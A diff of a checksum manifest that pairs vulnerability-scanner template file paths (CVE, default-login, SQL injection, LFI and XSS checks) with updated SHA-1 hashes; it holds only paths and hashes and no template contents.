http/cves/2024/CVE-2024-41810.yaml:e4018ecece1eb1b68dd8f10d3b1691fb14546a0e http/cves/2024/CVE-2024-41955.yaml:226ee0e7732a2e17b312776ac8c020ca60dad2e3 -http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac -http/cves/2024/CVE-2024-4295.yaml:7c3e58627bc8d2cfbeba41d4e5b02805b06aac35 +http/cves/2024/CVE-2024-4257.yaml:c0ec3261119b4348cc82b39d61fcd3323e36aa85 +http/cves/2024/CVE-2024-4295.yaml:ad0ccb95aa9f46d32eb41032c4f936fa0f244a7c http/cves/2024/CVE-2024-43160.yaml:d5baeeff92f97904c3b6202e25f3160dfa6d4111 http/cves/2024/CVE-2024-43360.yaml:3f356b02751421cf88296936e0ae88b0938d99e8 http/cves/2024/CVE-2024-43425.yaml:c5d55fa9159426dcb15d374d7c51b13a1050e71d http/cves/2024/CVE-2024-4348.yaml:b875149da3d86eb5be674c5f5e93606f3d448a06 http/cves/2024/CVE-2024-4358.yaml:13a3a1250e1529ffc91043931bb2fc322998103f -http/cves/2024/CVE-2024-43917.yaml:8feef564db794f7d2b90a4dd9aa7355697ea73aa +http/cves/2024/CVE-2024-43917.yaml:8252b0282d9eb281a703231be7a67f6041c8ada7 http/cves/2024/CVE-2024-44000.yaml:da1f708dc158096fe8c628af6e36b51e21958ebb http/cves/2024/CVE-2024-4434.yaml:597591d430f802f75a17c2c04ae3aee6dcf392de http/cves/2024/CVE-2024-44349.yaml:87dce5297e2e20337d4193bc5cf64ae3099a9810 -http/cves/2024/CVE-2024-4443.yaml:d23e057ea00b1051ec865516a6e246c71ddf420b +http/cves/2024/CVE-2024-4443.yaml:f276b417bcd274b527cf5ba018e541d7981c3778 http/cves/2024/CVE-2024-44849.yaml:9ca7cec952e5f2f8cbfa8e76fc365d8f03f84dac http/cves/2024/CVE-2024-45195.yaml:331e8730b2a9485b6a15057b67ce083f07c264a4 http/cves/2024/CVE-2024-45241.yaml:b32e4a46b08b7411b242362dafe333b209224ebb @@ -3858,18 +3858,18 @@ http/cves/2024/CVE-2024-5420.yaml:2c6ffdcabd6e7589c4eb5353c0e74066809de6a4 http/cves/2024/CVE-2024-5421.yaml:d0ea0763fb92fd29c11f39fa22f6ad7137735720 http/cves/2024/CVE-2024-5488.yaml:7d9ad7b220289088483a190e02e00798e0abe138 http/cves/2024/CVE-2024-5522.yaml:4ead21579625d4141e498a5837a73a31b2b99b25 -http/cves/2024/CVE-2024-5765.yaml:487b5d32da8c2a9405653daab7369763cf83830e +http/cves/2024/CVE-2024-5765.yaml:1c10efb805cfff6963265494c3a2ea18c604e4a8 http/cves/2024/CVE-2024-5827.yaml:c8c798630092a11d237eba98e68105f7ddb8cc02 http/cves/2024/CVE-2024-5910.yaml:cab168cead701596d134d1a2a40f96fb5693abf7 http/cves/2024/CVE-2024-5932.yaml:2c58bd22878f10edce95bb47ae01405f95382466 http/cves/2024/CVE-2024-5936.yaml:972f0727571f647e196b34f205727a958b1d6bee http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 -http/cves/2024/CVE-2024-5975.yaml:22f23937132b445a583eab64d7d68219bfb78032 -http/cves/2024/CVE-2024-6028.yaml:ffbaa09018a2f94a343ca80231cebff1e9402c7c +http/cves/2024/CVE-2024-5975.yaml:43eeb8147316086be8b12232c8ac089619081bfb +http/cves/2024/CVE-2024-6028.yaml:2aa44718aa2ed8e791377c76f379baee64cffe6b http/cves/2024/CVE-2024-6095.yaml:862cb6d3999fd1b0d3efd36862e204ed877e1fd4 -http/cves/2024/CVE-2024-6159.yaml:3c328b91cddaf0dacd8628b9a2b31dc5da2f0481 +http/cves/2024/CVE-2024-6159.yaml:887fd53fe3d7e843ac98de5d1da68d6776bc87a1 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 -http/cves/2024/CVE-2024-6205.yaml:b7365f0543b4c8a4207086dcf8c8eba65bca7a5d +http/cves/2024/CVE-2024-6205.yaml:10d11253221aa83c78b14c84e64d51ebd5cccc57 http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 http/cves/2024/CVE-2024-6366.yaml:13d57831fba2fd50976e1e01e8048ff76767e4a9 http/cves/2024/CVE-2024-6396.yaml:d43fd7550c98ff812713b0f7dbbed20b18bd42af @@ -3887,13 +3887,13 @@ http/cves/2024/CVE-2024-6846.yaml:9304b8a4f3615a53012898d7a17c8e7237b8c210 http/cves/2024/CVE-2024-6893.yaml:9fa035fda8881ae39914bd460477cfa0b7024b1e http/cves/2024/CVE-2024-6911.yaml:28c05ebb786c6f354da18c72ba66983f9eca7aa7 http/cves/2024/CVE-2024-6922.yaml:9d4efd92473615da21a9adb5df5ef085148660ca -http/cves/2024/CVE-2024-6924.yaml:ab3f6dc1f54edbbc6d2a855be377cd4add811b9d -http/cves/2024/CVE-2024-6926.yaml:19e2526806ef0cc49e885b9e3583655e9caaabb4 -http/cves/2024/CVE-2024-6928.yaml:13d3d37e9e6196cedae6cace758fd33bf5c850c1 +http/cves/2024/CVE-2024-6924.yaml:331dd6901a51f3d5f079faf0bb8d3b7085c9a665 +http/cves/2024/CVE-2024-6926.yaml:9e60c9f4e32840df75aa0a280c35bed86a6cb0c1 +http/cves/2024/CVE-2024-6928.yaml:089585b541cbf67a3d353eba5a9ef90604b1a8f3 http/cves/2024/CVE-2024-7008.yaml:2d23207579f9c9f5850d45a062e1eea818b7f238 http/cves/2024/CVE-2024-7029.yaml:2439dd78411db10e3793916d7ae3885ee8801cac http/cves/2024/CVE-2024-7120.yaml:1cb58450440b39c5cc43b9254854e957e962dbe8 -http/cves/2024/CVE-2024-7188.yaml:5edd2259c08b9141388e13eb5fba2281baa93044 +http/cves/2024/CVE-2024-7188.yaml:769527ce3a8e1e87b67e2ea34f2c663f8bf0e2df http/cves/2024/CVE-2024-7332.yaml:182732f21ab14541c5bcd558ddffd2ee319bd5e9 http/cves/2024/CVE-2024-7339.yaml:b93615f467c28d37cd0748ccd84bd5dc7c9d563f http/cves/2024/CVE-2024-7340.yaml:e3489c94ab5c5b0f6e2877b59423932a431a6721 @@ -3901,21 +3901,21 @@ http/cves/2024/CVE-2024-7354.yaml:9b48426b3d7f3c65c82095d639ba7aa5ff041091 http/cves/2024/CVE-2024-7593.yaml:31e729f81f358c7474755587186c392dfc03a497 http/cves/2024/CVE-2024-7714.yaml:94f10327c2270247b51f9678dfda64e21ebfb3e1 http/cves/2024/CVE-2024-7786.yaml:3b9e29c00265bf7af884982862d1c1176d6170f9 -http/cves/2024/CVE-2024-7854.yaml:2caf1cc4e1d4fdbc2238e0c1c90f7ea3f59355c3 +http/cves/2024/CVE-2024-7854.yaml:1346b071b2ed5a3ac9d409182730e4410e74eaa0 http/cves/2024/CVE-2024-7928.yaml:301c96817774a149c05b14d1e2e28e76b715f7dc http/cves/2024/CVE-2024-7954.yaml:2e36972b077a61133a6a6a3227ae4101b69c3a36 http/cves/2024/CVE-2024-8021.yaml:65b6ce4484ba9a9f8b24d7b29103eedf9f897c01 http/cves/2024/CVE-2024-8181.yaml:c571c26419e2cec8e67338cf377248d6b45c0f60 -http/cves/2024/CVE-2024-8484.yaml:172fefcb990e48b9ef12889d0af940db932bd2e3 -http/cves/2024/CVE-2024-8503.yaml:08fce8a25057c938584c9961eff1c3e85895aeb9 +http/cves/2024/CVE-2024-8484.yaml:5a5e6dc7cf8c79a52b84fe3442f84a0e6794fe95 +http/cves/2024/CVE-2024-8503.yaml:da8ca95b4f0cc45dd9feebaf1fae92bcbff76a17 http/cves/2024/CVE-2024-8517.yaml:640de66acc51d345455036b12592362ed66f3aa7 -http/cves/2024/CVE-2024-8522.yaml:09335354eb86ce56a34931ab158800f4dcb9826c +http/cves/2024/CVE-2024-8522.yaml:e0ede27034e3e6e3e907211f527f9213d08d2a52 http/cves/2024/CVE-2024-8752.yaml:f0f9dca783b57c1fd5e47592e224f888d47c1747 http/cves/2024/CVE-2024-8877.yaml:d5b12c9a0e91fabea84efd078485f4fd57703738 http/cves/2024/CVE-2024-8883.yaml:e02b12d824d8f4df3edd0ee981eb0284215409dd http/cves/2024/CVE-2024-9014.yaml:ea54c9f07357a92fb915794e7be909d11545753f http/cves/2024/CVE-2024-9463.yaml:80dc0d8f82b6d69a77dbdbfcc20988bbcfbc83f1 -http/cves/2024/CVE-2024-9465.yaml:89be5374cae537050432302f8205e5b0cf7ff2f1 +http/cves/2024/CVE-2024-9465.yaml:56a7545f686d5ad83afed3a041656a5145b646be http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -8445,7 +8445,7 @@ http/vulnerabilities/hikvision/hikvision-ivms-file-upload-rce.yaml:94de4453e34e7 http/vulnerabilities/hikvision/hikvision-js-files-upload.yaml:cdcf6ca5518af130ebd36c1531365f6bb79001c5 http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml:1aaf88fdaf99c3bec106e0e4f1ff11aa601db508 http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml:8bc737814b6509549a4eba8b1b29cb7d2b39ae14 -http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml:298ad00407b5edb22380a970d6ddc9c64b11f2b1 +http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml:30cd8b1c15bd5a595de8e4d84461e6eb7a5d9a90 http/vulnerabilities/httpbin/httpbin-open-redirect.yaml:1b66933da5367fcad1de79ed46e41dd9b6b4543a http/vulnerabilities/httpbin/httpbin-xss.yaml:b8072d3dcf45a6ca85ef27483281733357126da7 http/vulnerabilities/huatian/huatian-oa-sqli.yaml:f4f35ad79e01a4fde957a9c16e13167c085e0341 @@ -8538,7 +8538,7 @@ http/vulnerabilities/other/aic-intelligent-password-exposure.yaml:f31b5c3d8bb757 http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:ec53fcff7689e47418ad652a41c4f0120ba53826 http/vulnerabilities/other/alumni-management-sqli.yaml:44c134fdb53c7bf6bbc9779b785a4339900d594a http/vulnerabilities/other/apache-druid-log4j.yaml:332fb262f1a82254f9f83aeabc577997e2b5bd80 -http/vulnerabilities/other/applezeed-sqli.yaml:634b09843a3695264a07660a2d827fa1f6c4a82e +http/vulnerabilities/other/applezeed-sqli.yaml:90c8eea43829edfb2fb99631304331024174bd00 http/vulnerabilities/other/aquatronica-info-leak.yaml:6b90129c71b401a56ea780ca90fd695d6d8a4a76 http/vulnerabilities/other/array-vpn-lfi.yaml:bb5928be11dca9e65e277898272a05a51d1f1768 http/vulnerabilities/other/asanhamayesh-lfi.yaml:5b667a416dec3c28014f255eee89f7155c6392f7 @@ -8547,7 +8547,7 @@ http/vulnerabilities/other/aspnuke-openredirect.yaml:0253728ab4ba638b3469701d2a7 http/vulnerabilities/other/avada-xss.yaml:09956730db06c6d4aa404e59c94ee74a60dde829 http/vulnerabilities/other/avcon6-execl-lfi.yaml:43a317b3891b8f3dd98a950eec826ee91a95b97d http/vulnerabilities/other/avcon6-lfi.yaml:31fda2c65574c91b2ccd8e140e03243fb9546bd0 -http/vulnerabilities/other/azon-dominator-sqli.yaml:7483beba5590f73b979a38863503f30b7be95dcc +http/vulnerabilities/other/azon-dominator-sqli.yaml:66625ef646bc8de23a43e768609857ded00e37e4 http/vulnerabilities/other/bagisto-csti.yaml:099509cda3a5df99cf17c8e21b9bec4f72310860 http/vulnerabilities/other/bems-api-lfi.yaml:4b2ace615d63afc61e4401ca7c6d6bd3c7e0a02a http/vulnerabilities/other/beward-ipcamera-disclosure.yaml:4461c2309baf099cca67518def7863f003f459ac @@ -8581,7 +8581,7 @@ http/vulnerabilities/other/crawlab-lfi.yaml:124a1ad1f04cf5c4d9a1821b3ebe29cba5cc http/vulnerabilities/other/crocus-lfi.yaml:c8a0d15b5a6be90113f2804a107b25cab5216344 http/vulnerabilities/other/crystal-live-server-lfi.yaml:ae6114c40d666570e17f1b4f2a285ddea6fa727f http/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml:241ee9a519cfff44caeb125dd2115d6a8177d379 -http/vulnerabilities/other/csz-cms-sqli.yaml:6ad14e7027dcc881e16079bf26a66c3161aec50f +http/vulnerabilities/other/csz-cms-sqli.yaml:0a2669f585b5b2fc7b70a8e97bd25f2980361ef5 http/vulnerabilities/other/cvms-sqli.yaml:ec464508121f9e8cf8d4a09afecdf0e4504e0a91 http/vulnerabilities/other/dicoogle-pacs-lfi.yaml:6e5b5c3c544a515745402643c55ae8bae1d2bdb5 http/vulnerabilities/other/digital-ocean-ssrf.yaml:db50a5ab749f49cb2f0df479e72c6761d6116107 @@ -8597,7 +8597,7 @@ http/vulnerabilities/other/dzzoffice-xss.yaml:e310666d42c2670e38a5f59b35d7033de0 http/vulnerabilities/other/eaa-app-lfi.yaml:97b0823d04ad3588ce93c66dd73c78dff743f1be http/vulnerabilities/other/easycvr-info-leak.yaml:fe5d2797c3df40731ae6fed741754e9de2270e4f http/vulnerabilities/other/easyimage-downphp-lfi.yaml:c13b2da7bd29bd39b5c0e7b09d94a864c38367ac -http/vulnerabilities/other/ecology-oa-file-sqli.yaml:4f4e227981da4efe6ba2a681a339f6facdeb532b +http/vulnerabilities/other/ecology-oa-file-sqli.yaml:be1eb6d065f871d992f326c6a995fc9dd3b73236 http/vulnerabilities/other/ecshop-sqli.yaml:3721aa258e1175af258823415bd33418462d926f http/vulnerabilities/other/ecsimagingpacs-rce.yaml:225ae97e89c774cfaff636a3f7f7115e1fd36ecf http/vulnerabilities/other/eibiz-lfi.yaml:cbf9aa62b6d93b0b8cc1ab70dd1fa1b7da422c9e @@ -8626,7 +8626,7 @@ http/vulnerabilities/other/flir-ax8-rce.yaml:fd4b4d66415434181644159f4e9df2783a6 http/vulnerabilities/other/flir-path-traversal.yaml:20ea7ec9ae605259a3ad44331264f78d544e3626 http/vulnerabilities/other/fortiportal-log4j-rce.yaml:88277141f9e9562c8b31492490287d294fe53261 http/vulnerabilities/other/fumasoft-sqli.yaml:66dfbb4fa91e289e8090cd7032ac39e03bbaeda2 -http/vulnerabilities/other/fumengyun-sqli.yaml:2de56976458c2b0ae97f283ea16683b65e1d40d2 +http/vulnerabilities/other/fumengyun-sqli.yaml:47d1098f9f3a2788362a05b7d1da44cb7906d847 http/vulnerabilities/other/geovision-geowebserver-lfi.yaml:476840a88653978b6c8a2d47c93341540460f1f7 http/vulnerabilities/other/geovision-geowebserver-xss.yaml:2dfb7186e21a93d525fb29eb4c2039ad26e3c7d1 http/vulnerabilities/other/global-domains-lfi.yaml:0aa5e3656a841e228dafc74bb53a23bc4f2cea3f @@ -8636,7 +8636,7 @@ http/vulnerabilities/other/gloo-unauth.yaml:103fc062925a65126c81ed7c040fba23fcc2 http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml:e55b7ff85c72e934c9ac62819412f6b8685ec40d http/vulnerabilities/other/goip-1-lfi.yaml:666ae8eb415950f4e48a2c5dd13fffafc73c98f1 http/vulnerabilities/other/graylog-log4j.yaml:a72e50a54f070a1391be0efd626835a3ead7a0be -http/vulnerabilities/other/groomify-sqli.yaml:3f757a7ee830559df2f4d03cd5635e1f5c76b099 +http/vulnerabilities/other/groomify-sqli.yaml:f5c9dcda83c50fd7fae26ad6e9b25156c3cac398 http/vulnerabilities/other/groupoffice-lfi.yaml:f1295e4d7dc7dd52e038ade2373f4576de55dbf8 http/vulnerabilities/other/gsoap-lfi.yaml:aa242baa6456667473b08929ebdd2391ec263823 http/vulnerabilities/other/gz-forum-script-xss.yaml:4f9e19fc198666441fc949361b7e2815bb7e3622 @@ -8745,7 +8745,7 @@ http/vulnerabilities/other/office365-indexs-fileread.yaml:b30261ef67c3851a41cf4a http/vulnerabilities/other/okta-log4j-rce.yaml:14a63fd056f3c50893c6677ae5c3147c250fcdfb http/vulnerabilities/other/oliver-library-lfi.yaml:0c562afa980a95c35964e62e3ad5476d16a54a98 http/vulnerabilities/other/onlinefarm-management-xss.yaml:5514948e1f2a6b19ff81f2b7560e15a6fecb55e1 -http/vulnerabilities/other/opencart-core-sqli.yaml:dfa6e0181ab99bb2a54bee08009b546523e644fa +http/vulnerabilities/other/opencart-core-sqli.yaml:bcbf68b18fb9db2c8601979570c1a11c99d1de62 http/vulnerabilities/other/opencti-lfi.yaml:0657c6c72882bd82f5c0df0510029a1be5f47633 http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml:bb3992cc715f9044204203eb27517c4b30bc5eee http/vulnerabilities/other/openshift-log4j-rce.yaml:66bf1e4104096a9a1ebcd41202fe8e7a163d1b0e @@ -8772,10 +8772,10 @@ http/vulnerabilities/other/phpok-sqli.yaml:8bdcd398a417d164993cb27ea272bf9db8433 http/vulnerabilities/other/phpwiki-lfi.yaml:37fa61e3fc028ebe9d2996fbdf38cd6015264740 http/vulnerabilities/other/phuket-cms-sqli.yaml:120bcd9d748d32a71eab7b77f98969e3fc797aae http/vulnerabilities/other/phuket-cms-xss.yaml:a66543f506ca15df59732da947df46ebe7773634 -http/vulnerabilities/other/pingsheng-electronic-sqli.yaml:f1ddab93e18549c7b6f4237654947c9bf0d34bf4 +http/vulnerabilities/other/pingsheng-electronic-sqli.yaml:721684b726c991357ada33751a79dc5da613922a http/vulnerabilities/other/pmb-directory-traversal.yaml:3edd65226116e222366fb702f21ea383bd6a36a0 http/vulnerabilities/other/pmb-local-file-disclosure.yaml:a98bdbfe2c304c27096a31febde9927d89073c1b -http/vulnerabilities/other/pmb-sqli.yaml:a8b2c7246901ec38ea0a9685c51d04c6faa4a2ca +http/vulnerabilities/other/pmb-sqli.yaml:2e0d962bdf2f501f41d996750787f440ff3c4506 http/vulnerabilities/other/pmb-xss.yaml:d51555e7987e0a2f8ff7868fe967fbed325d322d http/vulnerabilities/other/podcast-generator-ssrf.yaml:2f4a63c8959c6a9327cd0d5c7a1db427eb5376ad http/vulnerabilities/other/pollbot-redirect.yaml:24e331e5f53a3512a35ff500a32d9c20ca794d14 @@ -8790,7 +8790,7 @@ http/vulnerabilities/other/qihang-media-lfi.yaml:5179a2b7499e31740c7e5853134f540 http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml:93bfb8a42d56a33f2a5e98198809398d8959fec6 http/vulnerabilities/other/quick-cms-sqli.yaml:8b01329bd91a4ab64f633271b7c7b0b04fbacf93 http/vulnerabilities/other/rconfig-file-upload.yaml:6b584224ce733091e225ab49df9a2758794a38de -http/vulnerabilities/other/readymade-unilevel-sqli.yaml:2c90c99774a595e7413760515b644598a0e7cff3 +http/vulnerabilities/other/readymade-unilevel-sqli.yaml:20518c2200db97ae9372c25102c4923b25e73ff8 http/vulnerabilities/other/readymade-unilevel-xss.yaml:92bc151201a26eebb660d6a2a70ae42f703b3f2e http/vulnerabilities/other/reddittop-rss-xss.yaml:2b532fb620fd700b948d65dfc69227741e2adb07 http/vulnerabilities/other/rentequip-xss.yaml:f9841ce026f105a62494dac86be35464c59393ba @@ -8813,7 +8813,7 @@ http/vulnerabilities/other/servicenow-helpdesk-credential.yaml:fe8c27aed21831daa http/vulnerabilities/other/sharp-printers-lfi.yaml:c6aa2eabdff666aec8f651d4394a6da7518bd527 http/vulnerabilities/other/shoowbiz-xss.yaml:05930d6afad56df16826196777333587acf80310 http/vulnerabilities/other/sick-beard-xss.yaml:eb652b90fdac36a07eb3b58a37005befbdaa2585 -http/vulnerabilities/other/sitemap-sql-injection.yaml:2b3ec87344ddfb723073b534383371158cf06904 +http/vulnerabilities/other/sitemap-sql-injection.yaml:5e72d87179173e63be2f3479457c4ef2bc6af3c5 http/vulnerabilities/other/siteminder-dom-xss.yaml:cd957a17281173b60544867f7ec9af50e55f80f3 http/vulnerabilities/other/sl-studio-lfi.yaml:b534bd162e5b731754ef725d721b9ff60c6c4df3 http/vulnerabilities/other/slims-xss.yaml:48d2b9f3981d0eb4e5b832a1948d3a4c06f2be99 @@ -8829,7 +8829,7 @@ http/vulnerabilities/other/spark-webui-unauth.yaml:e7bdc184047154fcdca9aa5862cef http/vulnerabilities/other/splunk-enterprise-log4j-rce.yaml:3148506ab12991f880dfb5bdfde67a2893a0c7b7 http/vulnerabilities/other/sponip-network-system-ping-rce.yaml:81d5e41b6b741ee4db2819a49071cac7ba5060fa http/vulnerabilities/other/sslvpn-client-rce.yaml:7972016d297b5e0fc24f07cbaa8fa3129ecf15df -http/vulnerabilities/other/stackposts-sqli.yaml:75c9f096896e63ce2b16e0143dca7514e57b7ca4 +http/vulnerabilities/other/stackposts-sqli.yaml:f4d15cedc8a43b2675f02a0788054ac7dcb71eb0 http/vulnerabilities/other/steve-xss.yaml:2555f08b8d6301e924ed26c9a4bd3e39ebd87eb5 http/vulnerabilities/other/surrealtodo-lfi.yaml:946ddddaa6ac882b1a2fe3cf6b84a029d8904435 http/vulnerabilities/other/symantec-messaging-gateway.yaml:f501f76c255113f13e4c5973de3419a6d8ab8609 @@ -8892,7 +8892,7 @@ http/vulnerabilities/other/zzcms-xss.yaml:16bcfdc7025566b60cd5440ea331d5395dd41c http/vulnerabilities/php/php-xdebug-rce.yaml:b50c0de8f5f6590bae1f200c2b6624f69e03e8ce http/vulnerabilities/phpmyadmin-unauth.yaml:ca038145f037ff1738ac92f1546d7ed3601db326 http/vulnerabilities/portainer-init-deploy.yaml:93713c9e50dea4da7a387e9be325229a914eb433 -http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:2219fbfc674d75da5a80249d5b117d45d9a30423 +http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:8001d12708cd3a023678dc36504fde27648aae45 http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:0b32a638549671e774b957acf840484b840eb6c0 http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:5eb3b6305e550c1b5e589d7b8c2f64337cd25190 http/vulnerabilities/projectsend-auth-bypass.yaml:3084e0f86289facef6ce77985a59acb3a3fc88fd @@ -8974,7 +8974,7 @@ http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml:9061b5a5e6523f698d8 http/vulnerabilities/ueditor/ueditor-ssrf.yaml:5682542e65f0187865e4636ab07173e3b7b5b024 http/vulnerabilities/ueditor/ueditor-xss.yaml:222e1f2da270e70eb6a8c9a9b57ba955b9ecb785 http/vulnerabilities/vbulletin/arcade-php-sqli.yaml:35f755a9aa0bccaf5f4a43ab3af0efc085808fff -http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml:3a6813792037cdc319c47119dd0f74ebf1be722f +http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml:bd637100c09cc448263bda3f8dbc87c459e19f9a http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml:5565f8dcc7d5ad169422fd7e698c0399f79ab961 http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml:37d76f69d3a25c0182540bfc98069a69ec114f3b http/vulnerabilities/videoxpert-lfi.yaml:ec4e6aa5a149d300840b31223f4ba3747bfdedfb @@ -8989,7 +8989,7 @@ http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml:821755107e8c8301abe3db3da34f http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml:3645d8495d3ba8fef9298985d8304f52c79fcf3c http/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml:d1e9919f8600fccb128a7ecf80e0cc7372020b03 http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml:8168b3d77b21246a17b15576622c39fe6ce54ee1 -http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml:cdd7808a6d198f04c9b6b756a589cbf51728d248 +http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml:87b69368b89dc967d572eb908cddf24a226c2088 http/vulnerabilities/wanhu/wanhu-download-ftp-file-read.yaml:e02472b72f5d9878047c3889a58f58ad03e82a7d http/vulnerabilities/wanhu/wanhu-download-old-file-read.yaml:3cff53af82accffec2e351d7df60e5e4e35db74a http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml:e738eece341969c65a3381e85af0d15fcb6a1e7e @@ -9035,7 +9035,7 @@ http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml:9d221fd26d91a4 http/vulnerabilities/wordpress/404-to-301-xss.yaml:a30b57b7feea1bee062c7817cfa3490092945344 http/vulnerabilities/wordpress/ad-widget-lfi.yaml:621f1f5870fe1d9aaffc931cae2d4fb056fa03e4 http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml:c9bbfbbc57db9a33166819b8daffeec876ce391a -http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml:1e2fa6b2e995b5df1ee6348f0a654814620961ad +http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml:47b6c0df2aa226f1e812ee9621cd2b34a12d3b94 http/vulnerabilities/wordpress/age-gate-open-redirect.yaml:ad4e4e0acc382c26644d276706a4bc32e6019267 http/vulnerabilities/wordpress/age-gate-xss.yaml:08d5c1d82f0d874ff0949a062ee4ad1b9e820362 http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml:18d7698febca91c75f2a9c3f16bc88a8f5deb2ea @@ -9073,7 +9073,7 @@ http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml:ce7a9fb4621d2f4f4 http/vulnerabilities/wordpress/issuu-panel-lfi.yaml:caa2fcc135d6bff7632fafb2f0ed3e276ba4fb85 http/vulnerabilities/wordpress/knr-widget-xss.yaml:0c594aa28e55985f7ae5e65940711ea122c92252 http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml:e33eb50ebb1a4029035fc5bc480ea4875d492ab5 -http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml:94a38bf427e0302645a57bb7e444ee5d6102d674 +http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml:677a003b57ecb729d7e6bb34fd480f77311a79b2 http/vulnerabilities/wordpress/members-list-xss.yaml:b4e7f0725ea83aebdb0a21c0811f78d7f185c5e4 http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml:c095a264544a0bbdedca4590feaafcf83eda584b http/vulnerabilities/wordpress/mthemeunus-lfi.yaml:2340e5de3b361855bb11e34ada0cad86e63144e4 @@ -9083,7 +9083,7 @@ http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml:23e56d6cb81d817bdb http/vulnerabilities/wordpress/new-user-approve-xss.yaml:2fc0ad52b0e26d98a3115d6e65ca243755b34005 http/vulnerabilities/wordpress/newsletter-open-redirect.yaml:1881ec75c2b5fcc98bec1806e05eb36640563430 http/vulnerabilities/wordpress/ninja-forms-xss.yaml:38d8df5286157c052dbe71d91d8b17db74a1d518 -http/vulnerabilities/wordpress/notificationx-sqli.yaml:2bd8f4798bd1e221234055068b8cd7f129b8fb76 +http/vulnerabilities/wordpress/notificationx-sqli.yaml:cae1da4f1ee71a0a1e6b58ec9cc619eeaa29cc28 http/vulnerabilities/wordpress/photo-gallery-xss.yaml:b9b192a6c77b9d0abfa5d8f86225835971d31b16 http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml:8df886a64179ab1527de6d6a98621a1f09431357 http/vulnerabilities/wordpress/pieregister-open-redirect.yaml:27fba0e2523a5b9fe107a616a8f2e4a646211608 @@ -9129,13 +9129,13 @@ http/vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml:b93c44628a86329 http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml:602c01a348971ab6de4b0a99f28236671d7cefc0 http/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml:1828d443854306a616b2a9624848c28284fbb789 http/vulnerabilities/wordpress/wp-adaptive-xss.yaml:e44322e25cef461caf29f67d01ded889ffa560b8 -http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml:94c4fa2a5a16b780320818a4e7b4ee70406a2b0b +http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml:1f5884d6c619df19e848255bd5a5a439a288b182 http/vulnerabilities/wordpress/wp-adivaha-xss.yaml:8c442fe54900e5a4873923cfba3431e3a6472735 http/vulnerabilities/wordpress/wp-all-export-xss.yaml:835dab6e7769a010535ff599f85d181918b92a31 http/vulnerabilities/wordpress/wp-altair-listing.yaml:8b4bcd2bb94c42e26f654308a73865b836402b96 http/vulnerabilities/wordpress/wp-ambience-xss.yaml:5b23993a7619230252ea0f5addb6398b4166e2c1 http/vulnerabilities/wordpress/wp-arforms-listing.yaml:1d6ff4f881b4fe560e40f931659518449cec25d6 -http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml:d00637e733223680b3b5e205f70800a97acb7757 +http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml:636b14635db8d40adb40ea366d736017f9bd6dd5 http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml:caf5f60512f9b2d1d1881ab49f20cf0ceed1890a http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml:d3ed04f7ea1318cc872d77ee4fe3aad813041b0a http/vulnerabilities/wordpress/wp-config-setup.yaml:d5a639e548f566b597f91aa5fa36bef2f836b8a6 @@ -9182,11 +9182,11 @@ http/vulnerabilities/wordpress/wp-security-open-redirect.yaml:556e7b23ab6b2ac5db http/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml:1e7de7df67e50bc32088aabdf0f2874925a51beb http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml:53c9899fabf461177fcbfea93c1a5c8a5674eeda 